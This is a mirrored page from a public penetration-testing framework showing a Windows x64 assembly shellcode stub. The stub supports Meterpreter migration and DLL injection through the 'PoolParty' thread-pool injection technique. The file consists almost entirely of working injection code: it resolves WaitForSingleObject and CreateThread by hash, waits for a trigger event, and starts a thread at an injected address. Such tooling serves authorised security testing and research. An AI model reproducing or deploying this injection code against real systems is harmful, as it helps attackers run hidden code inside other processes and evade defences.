Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/shellcode/windows/x64/src/migrate/poolparty.asm
28832 views
1
;-----------------------------------------------------------------------------;

2
; Author: Diego Ledda (diego_ledda[at]rapid7[dot]com)

3
; Compatible: Windows 11, 10

4
; Architecture: x64

5
; Version: 0.4 (July 2024)

6
; Size: 276 bytes

7
; Build: >build.py poolparty

8
;-----------------------------------------------------------------------------;

9


10
; Stub helper for pool-party injection.

11


12
;typedef struct _POOLPARTYCTX

13
;{

14
; 	union

15
;	{

16
;		LPVOID lpStartAddress;

17
;		BYTE bPadding1[8]; 

18
;	} s;

19
;	union

20
;	{

21
; 	LPVOID lpParameter;

22
;		BYTE bPadding2[8];

23
;	} p;

24
;	union

25
;	{

26
; 	LPVOID hEventTrigger;

27
;		BYTE bPadding2[8];

28
;	} e;

29
; 

30
;} POOLPARTYCTX, * LPPOOLPARTYCTX;

31
; Description:

32
;     This stub is executed during the Meterpreter migration and DLL Injection. The POOLPARTYCTX must be allocated ALWAYS at the end of the shellcode,

33
;     this is mandatory as some pool-party variants doesn't support arguments passing. Also an hEventTrigger during migration is mandatory because 

34
;     we need to wait the ok from the previous Meterpreter to continue the execution. with other techniques (RemoteThread and APC)

35
;     We are starting the process in SUSPENDED mode and then Resuming it, here we need to wait for an event.

36
;     This shellcode is done to work with multiple PoolParty variants.

37
;     Supported Variants:

38
;             - TP Direct Insertion

39


40
[BITS 64]

41
[ORG 0]

42
  cld                      ; Clear the direction flag.

43
  push rbp

44
  push rdi

45
  push rsi

46
  mov rdi, rsp             ; Saves RSP to RDI

47
  jmp _parameters          ; Get the POOLPARTYCTX after the shellcode,

48
_cb_parameters:            ; Unluckly in some PoolParty variants we cannot receive parameters.

49
  pop rsi                  ; RSI = POOLPARTYCTX

50
  sub rsp, 0x78            ; Alloc some space on stack

51
  call start               ; Call start, this pushes the address of 'api_call' onto the stack.                  ;

52
%include "./src/block/block_api.asm" ;

53
start:                     

54
  pop rbp                  ; Pop off the address of 'api_call' for calling later.

55
  mov ecx, [rsi+16]        ; Get hEventTrigger

56
  xor rdx, rdx             ;

57
  dec edx                  ; Decrement rdx down to -1 (INFINITE)

58
  mov r10d, 0x601D8708     ; hash( "kernel32.dll", "WaitForSingleObject" )

59
  call rbp                 ; WaitForSingleObject(hEventTrigger, INFINITE);

60
  xor rdx, rdx             ; zero RDX

61
  mov r8, [rsi]            ; r8 = ctx->lpStartAddress

62
  mov r9, [rsi+8]          ; r9 = ctx->lpParameter

63
  xor rcx, rcx             ; Clear ECX, lpThreadAttributes

64
  push rcx                 ; lpThreadId 

65
  push rcx                 ; dwCreationFlags

66
  mov r10d, 0x160D6838     ; hash( "kernel32.dll", "CreateThread" )

67
  call rbp                 ; CreateThread( NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL );

68
cleanup:

69
  mov rsp, rdi             ; Restore Stack

70
  pop rsi

71
  pop rdi

72
  pop rbp

73
  ret

74
_parameters:

75
  call _cb_parameters      ; Simple way to get the address of the POOLPARTYCTX using the return address

76